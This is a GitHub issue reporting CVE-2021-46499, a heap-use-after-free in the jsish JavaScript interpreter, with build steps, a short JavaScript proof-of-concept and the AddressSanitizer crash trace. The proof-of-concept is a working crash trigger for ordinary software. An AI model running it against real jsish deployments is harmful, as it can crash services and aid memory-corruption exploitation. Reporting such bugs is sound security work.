CVE-2021-46499: Heap-use-after-free src/jsiValue.c:245 in jsi_ValueCopyMove · Issue #76 · pcmacdon/jsish

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

Comments

Jsish revision

Commit: 9fa798e

Version: v3.5.0

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

export CFLAGS=’-fsanitize=address’ make

Test case

function JSEtest(){}

var arr = /x?y?z?/.exec(“abcd”); arr[arr[1000] = 3](arr.every(JSEtest), arr[1000] = 3, ‘1’)

​

Execution steps & Output

$ ./jsish/jsish poc.js

==99189==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000006e84 at pc 0x5637792b29cd bp 0x7ffef5f97e60 sp 0x7ffef5f97e50 READ of size 4 at 0x603000006e84 thread T0 #0 0x5637792b29cc in jsi_ValueCopyMove src/jsiValue.c:245 #1 0x5637792b29cc in Jsi_ValueCopy src/jsiValue.c:301 #2 0x5637795f6759 in jsi_ObjArraySetDup src/jsiEval.c:1054 #3 0x5637795f6759 in jsi_ValueObjKeyAssign src/jsiEval.c:1079 #4 0x5637795f6759 in jsiEvalCodeSub src/jsiEval.c:1303 #5 0x5637795fd15e in jsi_evalcode src/jsiEval.c:2204 #6 0x563779601274 in jsi_evalStrFile src/jsiEval.c:2665 #7 0x5637792f066a in Jsi_Main src/jsiInterp.c:936 #8 0x563779af503a in jsi_main src/main.c:47 #9 0x7f66650eebf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #10 0x563779284969 in _start (/usr/local/bin/jsish+0xe8969)

0x603000006e84 is located 4 bytes inside of 32-byte region [0x603000006e80,0x603000006ea0) freed by thread T0 here: #0 0x7f6665d5d7a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8) #1 0x5637792a56cf in Jsi_DecrRefCount src/jsiValue.c:52

previously allocated by thread T0 here: #0 0x7f6665d5dd28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28) #1 0x5637792f5aa4 in Jsi_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiValue.c:245 in jsi_ValueCopyMove Shadow bytes around the buggy address: 0x0c067fff8d80: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 0x0c067fff8d90: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 0x0c067fff8da0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd 0x0c067fff8db0: fa fa fd fd fd fd fa fa 00 00 04 fa fa fa 00 00 0x0c067fff8dc0: 04 fa fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa =>0x0c067fff8dd0:[fd]fd fd fd fa fa 00 00 00 00 fa fa fd fd fd fd 0x0c067fff8de0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd 0x0c067fff8df0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa 0x0c067fff8e00: 00 00 00 00 fa fa 00 00 00 00 fa fa fa fa fa fa 0x0c067fff8e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==99189==ABORTING

Credits: Found by OWL337 team.

1 participant